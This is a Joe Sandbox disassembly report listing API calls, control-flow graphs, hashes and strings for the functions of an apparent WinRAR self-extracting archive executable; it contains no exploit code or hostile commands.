                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3049964643-3743209390
                                                            • Opcode ID: 334908777a999bde1ba205a895a72fe8edf8644f7f4a8cf6937a552da4073856
                                                            • Instruction ID: 14307a033685ab4190f9ad354ab210b27b2d4a1de0e311242aacbe68dfa36558
                                                            • Opcode Fuzzy Hash: 334908777a999bde1ba205a895a72fe8edf8644f7f4a8cf6937a552da4073856
                                                            • Instruction Fuzzy Hash: 9561F5719083C5AFD320AB76EC89F6F77ECEB49704F040469F945A2291DB78D944C7A2
                                                            Function 00BEA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 812 bea6c2-bea6df FindResourceW 813 bea7db 812->813 814 bea6e5-bea6f6 SizeofResource 812->814 815 bea7dd-bea7e1 813->815 814->813 816 bea6fc-bea70b LoadResource 814->816 816->813 817 bea711-bea71c LockResource 816->817 817->813 818 bea722-bea737 GlobalAlloc 817->818 819 bea73d-bea746 GlobalLock 818->819 820 bea7d3-bea7d9 818->820 821 bea7cc-bea7cd GlobalFree 819->821 822 bea74c-bea76a call bf0320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 bea76c-bea78e call bea626 822->825 826 bea7c5-bea7c6 GlobalUnlock 822->826 825->826 831 bea790-bea798 825->831 826->821 832 bea79a-bea7ae GdipCreateHBITMAPFromBitmap 831->832 833 bea7b3-bea7c1 831->833 832->833 834 bea7b0 832->834 833->826 834->833
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA703
                                                            • LockResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BEB73D,00000066), ref: 00BEA72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 00BEA73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BEA762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00BEA7C6
                                                              • Part of subcall function 00BEA626: GdipAlloc.GDIPLUS(00000010), ref: 00BEA62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BEA7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 00BEA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: PNG
                                                            • API String ID: 211097158-364855578
                                                            • Opcode ID: 8ad2f997b718637d6b8979f3da2afa7ce4ee58d174c667ca14c59dfbbc784740
                                                            • Instruction ID: fc31025ad47de5ce9f2171f3f36f7a073c3dc4f32535f6cd4f9ad3593652619c
                                                            • Opcode Fuzzy Hash: 8ad2f997b718637d6b8979f3da2afa7ce4ee58d174c667ca14c59dfbbc784740
                                                            • Instruction Fuzzy Hash: 04316D75601382AFD7109F22EC88F2F7BFDEF89750B050559F90582661EB31ED44CAA1
                                                            Function 00BDA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1029 bda69b-bda6bf call beec50 1032 bda727-bda730 FindNextFileW 1029->1032 1033 bda6c1-bda6ce FindFirstFileW 1029->1033 1034 bda742-bda7ff call be0602 call bdc310 call be15da * 3 1032->1034 1035 bda732-bda740 GetLastError 1032->1035 1033->1034 1036 bda6d0-bda6e2 call bdbb03 1033->1036 1040 bda804-bda811 1034->1040 1037 bda719-bda722 1035->1037 1044 bda6fe-bda707 GetLastError 1036->1044 1045 bda6e4-bda6fc FindFirstFileW 1036->1045 1037->1040 1046 bda709-bda70c 1044->1046 1047 bda717 1044->1047 1045->1034 1045->1044 1046->1047 1049 bda70e-bda711 1046->1049 1047->1037 1049->1047 1051 bda713-bda715 1049->1051 1051->1037
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6C4
                                                              • Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA728
                                                            • GetLastError.KERNEL32(?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA734
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: 45d2895305d0e3fae8e3ce39250134c795d07eb781265f3abb47ce9ec50164e5
                                                            • Instruction ID: aae56e00dc0a37d37999bc6bdfdb02a759d4ed4b8b1670a00b0d16f43bb92ea1
                                                            • Opcode Fuzzy Hash: 45d2895305d0e3fae8e3ce39250134c795d07eb781265f3abb47ce9ec50164e5
                                                            • Instruction Fuzzy Hash: CF416C72901555ABCB25DF68CC88BEAF7F8FB48350F104196E969E3200E734AE94CF91
                                                            Function 00BF7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002,00000000), ref: 00BF7E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002,00000000), ref: 00BF7E16
                                                            • ExitProcess.KERNEL32 ref: 00BF7E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 1336b20996d806a632429f0e0ab2f731c02d2a7929e02b0c4dc080c3f5890fa8
                                                            • Instruction ID: 82a93a17879b5aa00587779936ca22b09fcb7fe7875c4e40c711ca17fad5e5f2
                                                            • Opcode Fuzzy Hash: 1336b20996d806a632429f0e0ab2f731c02d2a7929e02b0c4dc080c3f5890fa8
                                                            • Instruction Fuzzy Hash: A4E04631040188ABCF016F20CD09B6E3FAEEB10341F1144D5FA198B132CF36DE56CA80
                                                            Function 00BD848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 366a6af435ed4170294c8ce2ea0f3b46b3ff73857631a802f914af9c6c6752ab
                                                            • Instruction ID: ba5167b95f46cae4fa3fbc2b8a07417cf8122e20e0fa51f398e941dec8200413
                                                            • Opcode Fuzzy Hash: 366a6af435ed4170294c8ce2ea0f3b46b3ff73857631a802f914af9c6c6752ab
                                                            • Instruction Fuzzy Hash: 8282C770904285AEDF15DB64C895BFAFBE9EF15301F0845FBD8499B382EB315A84CB60
                                                            Function 00BEB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BEB7E5
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEB8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 00BEB902
                                                            • TranslateMessage.USER32(?), ref: 00BEB910
                                                            • DispatchMessageW.USER32(?), ref: 00BEB91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00BEB93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00BEB960
                                                            • GetDlgItem.USER32(?,00000068), ref: 00BEB983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BEB99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00C035F4), ref: 00BEB9B1
                                                              • Part of subcall function 00BED453: _wcslen.LIBCMT ref: 00BED47D
                                                            • SetFocus.USER32(00000000), ref: 00BEB9B8
                                                            • _swprintf.LIBCMT ref: 00BEBA24
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                              • Part of subcall function 00BED4D4: GetDlgItem.USER32(00000068,00C2FCB8), ref: 00BED4E8
                                                              • Part of subcall function 00BED4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00BEAF07,00000001,?,?,00BEB7B9,00C0506C,00C2FCB8,00C2FCB8,00001000,00000000,00000000), ref: 00BED510
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BED51B
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C035F4), ref: 00BED529
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED53F
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BED559
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED59D
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BED5AB
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED5BA
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED5E1
                                                              • Part of subcall function 00BED4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C043F4), ref: 00BED5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00BEBA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00BEBA90
                                                            • GetTickCount.KERNEL32 ref: 00BEBAAE
                                                            • _swprintf.LIBCMT ref: 00BEBAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 00BEBAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00BEBB43
                                                            • _swprintf.LIBCMT ref: 00BEBB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00BEBBD0
                                                            • GetCommandLineW.KERNEL32 ref: 00BEBBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00BEBC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00BEBC6F
                                                            • Sleep.KERNEL32(00000064), ref: 00BEBCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00BEBCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BEBCEB
                                                            • _swprintf.LIBCMT ref: 00BEBD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEBD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,00C035F4), ref: 00BEBD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 00BEBD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00BEBDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BEBDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEBE68
                                                            • _wcslen.LIBCMT ref: 00BEBEBE
                                                            • _swprintf.LIBCMT ref: 00BEBEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00BEBF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00BEBF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 00BEBF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00BEBF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 00BEBF85
                                                            • SetWindowTextW.USER32(00000000,00C1A472), ref: 00BEBFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00BEC007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEC01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00BEC0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00BEC197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00BEC1D9
                                                              • Part of subcall function 00BEC73F: __EH_prolog.LIBCMT ref: 00BEC744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BEC1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 3445078344-2238251102
                                                            • Opcode ID: 66a5a0884866cdb1eb81c59fb33a471bd9cea567cb0154f973ec06b362e54e7d
                                                            • Instruction ID: fb4395f135fafe31711fe0eb76ef56382478e1447b027a98b5f2ac56763d92b9
                                                            • Opcode Fuzzy Hash: 66a5a0884866cdb1eb81c59fb33a471bd9cea567cb0154f973ec06b362e54e7d
                                                            • Instruction Fuzzy Hash: 3B42D5719442C8BAEB21AB719C4AFBF7BFCEB02700F0440E5F645A61D2DB749A45CB61
                                                            Function 00BE0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 268 be0863-be0886 call beec50 GetModuleHandleW 271 be0888-be089f GetProcAddress 268->271 272 be08e7-be0b48 268->272 273 be08b9-be08c9 GetProcAddress 271->273 274 be08a1-be08b7 271->274 275 be0b4e-be0b59 call bf75fb 272->275 276 be0c14-be0c40 GetModuleFileNameW call bdc29a call be0602 272->276 278 be08cb-be08e0 273->278 279 be08e5 273->279 274->273 275->276 285 be0b5f-be0b8d GetModuleFileNameW CreateFileW 275->285 290 be0c42-be0c4e call bdb146 276->290 278->279 279->272 288 be0b8f-be0b9b SetFilePointer 285->288 289 be0c08-be0c0f CloseHandle 285->289 288->289 291 be0b9d-be0bb9 ReadFile 288->291 289->276 297 be0c7d-be0ca4 call bdc310 GetFileAttributesW 290->297 298 be0c50-be0c5b call be081b 290->298 291->289 294 be0bbb-be0be0 291->294 296 be0bfd-be0c06 call be0371 294->296 296->289 305 be0be2-be0bfc call be081b 296->305 308 be0cae 297->308 309 be0ca6-be0caa 297->309 298->297 307 be0c5d-be0c7b CompareStringW 298->307 305->296 307->297 307->309 312 be0cb0-be0cb5 308->312 309->290 311 be0cac 309->311 311->312 313 be0cec-be0cee 312->313 314 be0cb7 312->314 316 be0dfb-be0e05 313->316 317 be0cf4-be0d0b call bdc2e4 call bdb146 313->317 315 be0cb9-be0ce0 call bdc310 GetFileAttributesW 314->315 322 be0cea 315->322 323 be0ce2-be0ce6 315->323 327 be0d0d-be0d6e call be081b * 2 call bde617 call bd4092 call bde617 call bea7e4 317->327 328 be0d73-be0da6 call bd4092 AllocConsole 317->328 322->313 323->315 325 be0ce8 323->325 325->313 335 be0df3-be0df5 ExitProcess 327->335 334 be0da8-be0ded GetCurrentProcessId AttachConsole call bf3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->334 328->335 334->335
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 00BE087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BE088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BE08BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BE0B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE0B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BE0B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00C03C7C,00000000), ref: 00BE0BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BE0C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BE0C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00C03C7C,?,00000000,?,00000800), ref: 00BE0C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,00C03C7C,00000800,?,00000000,?,00000800), ref: 00BE0C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,00C03D44,00000800), ref: 00BE0CD8
                                                              • Part of subcall function 00BE081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
                                                              • Part of subcall function 00BE081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858
                                                            • _swprintf.LIBCMT ref: 00BE0D4A
                                                            • _swprintf.LIBCMT ref: 00BE0D96
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • AllocConsole.KERNEL32 ref: 00BE0D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 00BE0DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 00BE0DAF
                                                            • _wcslen.LIBCMT ref: 00BE0DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00BE0DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00BE0DDC
                                                            • Sleep.KERNEL32(00002710), ref: 00BE0DE7
                                                            • FreeConsole.KERNEL32 ref: 00BE0DED
                                                            • ExitProcess.KERNEL32 ref: 00BE0DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: 254a737fc9b5953544806bd5d5b69d44b5fefe4f006df757c3478b00316b5e03
                                                            • Instruction ID: 1d5f78f2747c2e387c1179b0a75dff905fc23683cb8226a9b5ad775a0dee9664
                                                            • Opcode Fuzzy Hash: 254a737fc9b5953544806bd5d5b69d44b5fefe4f006df757c3478b00316b5e03
                                                            • Instruction Fuzzy Hash: 92D172F10183C5ABDB20AF51C849B9FBBECFF85708F51495DF28596290DBB08649CB62
                                                            Function 00BEC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 347 bec73f-bec757 call beeb78 call beec50 352 bed40d-bed418 347->352 353 bec75d-bec787 call beb314 347->353 353->352 356 bec78d-bec792 353->356 357 bec793-bec7a1 356->357 358 bec7a2-bec7b7 call beaf98 357->358 361 bec7b9 358->361 362 bec7bb-bec7d0 call be1fbb 361->362 365 bec7dd-bec7e0 362->365 366 bec7d2-bec7d6 362->366 368 bed3d9-bed404 call beb314 365->368 369 bec7e6 365->369 366->362 367 bec7d8 366->367 367->368 368->357 380 bed40a-bed40c 368->380 370 bec9be-bec9c0 369->370 371 beca5f-beca61 369->371 372 beca7c-beca7e 369->372 373 bec7ed-bec7f0 369->373 370->368 378 bec9c6-bec9d2 370->378 371->368 376 beca67-beca77 SetWindowTextW 371->376 372->368 377 beca84-beca8b 372->377 373->368 379 bec7f6-bec850 call bea64d call bdbdf3 call bda544 call bda67e call bd6edb 373->379 376->368 377->368 381 beca91-becaaa 377->381 382 bec9e6-bec9eb 378->382 383 bec9d4-bec9e5 call bf7686 378->383 436 bec98f-bec9a4 call bda5d1 379->436 380->352 387 becaac 381->387 388 becab2-becac0 call bf3e13 381->388 385 bec9ed-bec9f3 382->385 386 bec9f5-beca00 call beb48e 382->386 383->382 392 beca05-beca07 385->392 386->392 387->388 388->368 401 becac6-becacf 388->401 398 beca09-beca10 call bf3e13 392->398 399 beca12-beca32 call bf3e13 call bf3e3e 392->399 398->399 424 beca4b-beca4d 399->424 425 beca34-beca3b 399->425 405 becaf8-becafb 401->405 406 becad1-becad5 401->406 411 becb01-becb04 405->411 413 becbe0-becbee call be0602 405->413 410 becad7-becadf 406->410 406->411 410->368 416 becae5-becaf3 call be0602 410->416 418 becb06-becb0b 411->418 419 becb11-becb2c 411->419 426 becbf0-becc04 call bf279b 413->426 416->426 418->413 418->419 437 becb2e-becb68 419->437 438 becb76-becb7d 419->438 424->368 427 beca53-beca5a call bf3e2e 424->427 431 beca3d-beca3f 425->431 432 beca42-beca4a call bf7686 425->432 446 becc06-becc0a 426->446 447 becc11-becc62 call be0602 call beb1be GetDlgItem SetWindowTextW SendMessageW call bf3e49 426->447 427->368 431->432 432->424 453 bec9aa-bec9b9 call bda55a 436->453 454 bec855-bec869 SetFileAttributesW 436->454 464 becb6c-becb6e 437->464 465 becb6a 437->465 440 becb7f-becb97 call bf3e13 438->440 441 becbab-becbce call bf3e13 * 2 438->441 440->441 458 becb99-becba6 call be05da 440->458 441->426 475 becbd0-becbde call be05da 441->475 446->447 452 becc0c-becc0e 446->452 483 becc67-becc6b 447->483 452->447 453->368 460 bec90f-bec91f GetFileAttributesW 454->460 461 bec86f-bec8a2 call bdb991 call bdb690 call bf3e13 454->461 458->441 460->436 470 bec921-bec930 DeleteFileW 460->470 490 bec8a4-bec8b3 call bf3e13 461->490 491 bec8b5-bec8c3 call bdbdb4 461->491 464->438 465->464 470->436 474 bec932-bec935 470->474 478 bec939-bec965 call bd4092 GetFileAttributesW 474->478 475->426 487 bec937-bec938 478->487 488 bec967-bec97d MoveFileW 478->488 483->368 484 becc71-becc85 SendMessageW 483->484 484->368 487->478 488->436 492 bec97f-bec989 MoveFileExW 488->492 490->491 497 bec8c9-bec908 call bf3e13 call befff0 490->497 491->453 491->497 492->436 497->460
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BEC744
                                                              • Part of subcall function 00BEB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00BEB3FB
                                                            • _wcslen.LIBCMT ref: 00BECA0A
                                                            • _wcslen.LIBCMT ref: 00BECA13
                                                            • SetWindowTextW.USER32(?,?), ref: 00BECA71
                                                            • _wcslen.LIBCMT ref: 00BECAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 00BECBFB
